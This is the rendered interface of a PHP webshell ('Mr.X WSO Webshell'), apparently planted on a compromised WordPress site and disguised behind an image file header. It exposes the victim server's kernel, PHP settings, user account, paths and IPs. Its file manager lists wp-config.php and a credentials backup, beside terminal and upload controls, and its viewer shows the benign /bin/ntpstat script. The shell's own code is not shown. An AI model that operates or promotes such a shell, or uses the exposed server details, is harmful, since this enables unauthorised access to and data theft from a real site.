����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:
Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-08 19:11:44
1999.30 GB Free: 85.81 GB (4%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-08 19:10:44drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-08 17:17:21drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: //bin/ntpstat
#!/bin/bash
#
# This is a shell script which prints the ntpd or chronyd synchronisation
# status, using the ntpq or chronyc program. It emulates the original
# ntpstat program written in C by G. Richard Keech, which implemented a
# subset of the mode6 protocol supported by ntpd.
#
# Copyright (C) 2016  Miroslav Lichvar <mlichvar@redhat.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

CHRONYC=("/usr/bin/chronyc" "-n")
NTPQ=("/usr/sbin/ntpq" "-c" "timeout 100" "-c" "raw")

export LC_ALL=C

parse_tracking_field() {
    local tracking=$1 name=$2 field
    field=$(echo "$tracking" | grep "^$name")
    echo "${field#* : }"
}

get_chronyd_state() {
    local output line disp delay
    local leap source address stratum distance poll

    output=$("${CHRONYC[@]}" tracking 2> /dev/null) || return 2

    leap=$(parse_tracking_field "$output" "Leap status")
    case "$leap" in
        "Normal") leap="0";;
        "Insert second") leap="1";;
        "Delete second") leap="2";;
        "Not synchronised") leap="3";;
    esac

    address=$(parse_tracking_field "$output" "Reference ID")
    address=${address%)*}
    address=${address#*(}

    stratum=$(parse_tracking_field "$output" "Stratum")
    delay=$(parse_tracking_field "$output" "Root delay")
    delay=${delay% seconds}
    disp=$(parse_tracking_field "$output" "Root dispersion")
    disp=${disp% seconds}
    offset=$(parse_tracking_field "$output" "System time")
    offset=${offset% seconds*}

    distance=$(echo "$delay $disp $offset" | \
               awk '{ printf "%.3f", ($1 / 2.0 + $2 + $3) * 1e3 }')

    if [ -n "$address" ]; then
        line=$("${CHRONYC[@]}" sources 2> /dev/null | \
            grep " $address ") || return 3
        poll=$(echo "$line" | awk '{ print $4 }')

        case "${line:0:1}" in
            "*"|"=") source="NTP server";;
            "#")     source="reference clock";;
            *)       source="unknown source";;
        esac
    fi

    echo "$leap,NTP server,$address,$stratum,$distance,$poll"
}

parse_rv_field() {
    local rv=$1 name=$2 field
    field=$(echo "$rv" | grep -o "$name=[^,]*")
    echo "${field#*=}"
}

get_ntpd_state() {
    local output syspeer_id disp delay
    local leap source address stratum distance poll

    output=$("${NTPQ[@]}" -c "rv 0" 2> /dev/null) || return 2
    [[ $output == *"associd"*"status"* ]] || return 3

    leap=$(parse_rv_field "$output" "leap")
    source=$(parse_rv_field "$output" "status" | \
        awk '{ print and(rshift(strtonum($1), 8), 0x3f) }')
    case "$source" in
        0) source="unspecified";;
        1) source="atomic clock";;
        2) source="VLF radio";;
        3) source="HF radio";;
        4) source="UHF radio";;
        5) source="local net";;
        6) source="NTP server";;
        7) source="UDP/TIME";;
        8) source="wristwatch";;
        9) source="modem";;
        *) source="unknown source";;
    esac

    stratum=$(parse_rv_field "$output" "stratum")
    delay=$(parse_rv_field "$output" "rootdelay")
    disp=$(parse_rv_field "$output" "rootdisp")
    distance=$(echo "$delay $disp" | awk '{ printf "%.3f", $1 / 2.0 + $2 }')

    : <<'EOF'
    syspeer_id=$("${NTPQ[@]}" -c associations 2> /dev/null |\
        grep 'sys\.peer' | awk '{ print $2 }') || return 4
    output=$("${NTPQ[@]}" -c "rv $syspeer_id" 2> /dev/null) || return 5

    if [ "$source" = "NTP server" ]; then
        address=$(parse_rv_field "$output" "srcadr")
    fi
    poll=$(parse_rv_field "$output" "hpoll")
EOF

    # bug compatibility with original EL7 ntpstat
    # - refid interpretted as IP address
    # - tc interpretted as poll
    # - code 1 (no drift file in NTPv4) printed as server restart in NTPv3
    address=$(parse_rv_field "$output" "refid")
    poll=$(parse_rv_field "$output" "tc")
    local code=$(parse_rv_field "$output" "status" | \
        awk '{ print and(strtonum($1), 0xf) }')
    if [ "$leap" -eq 3 ] && [ "$code" -eq 1 ]; then
        leap=4
    fi

    echo "$leap,$source,$address,$stratum,$distance,$poll"
}


max_distance=""
while getopts "m:h" opt; do
    case $opt in
        m)
            max_distance=$OPTARG
            ;;
        *)
            echo "Usage: $0 [-m MAXERROR]"
            exit 3
            ;;
    esac
done

if ! state=$(get_chronyd_state) && ! state=$(get_ntpd_state); then
    echo "Unable to talk to NTP daemon. Is it running?" >&2
    exit 2
fi

IFS=, read -r leap source address stratum distance poll <<< "$state"

if [ "$leap" -ge 0 -a "$leap" -le 2 ]; then
    printf "synchronised to %s" "$source"
    if [ -n "$address" ]; then
        printf " (%s)" "$address"
    fi
    if [ -n "$stratum" ]; then
        printf " at stratum %d\n" "$stratum"
    else
        printf ", stratum unknown\n"
    fi

    if [ -n "$distance" ]; then
        printf "   time correct to within %.0f ms" "$distance"
        if [ -n "$max_distance" ] &&
                echo "$distance $max_distance" | awk '{ exit $1 <= $2 }'; then
            printf " (exceeded maximum of %s ms)\n" "$max_distance"
            status=1
        else
            printf "\n"
            status=0
        fi
    else
        printf "accuracy unknown\n"
        [ -n "$max_distance" ] && status=1 || status=0
    fi
else
    printf "unsynchronised\n"
    if [ "$leap" -eq 4 ]; then
        printf "  time server re-starting\n"
    fi
    status=1
fi

if [ -n "$poll" ]; then
    printf "   polling server every %d s\n" "$[2**$poll]"
else
    printf "poll interval unknown\n"
fi

exit $status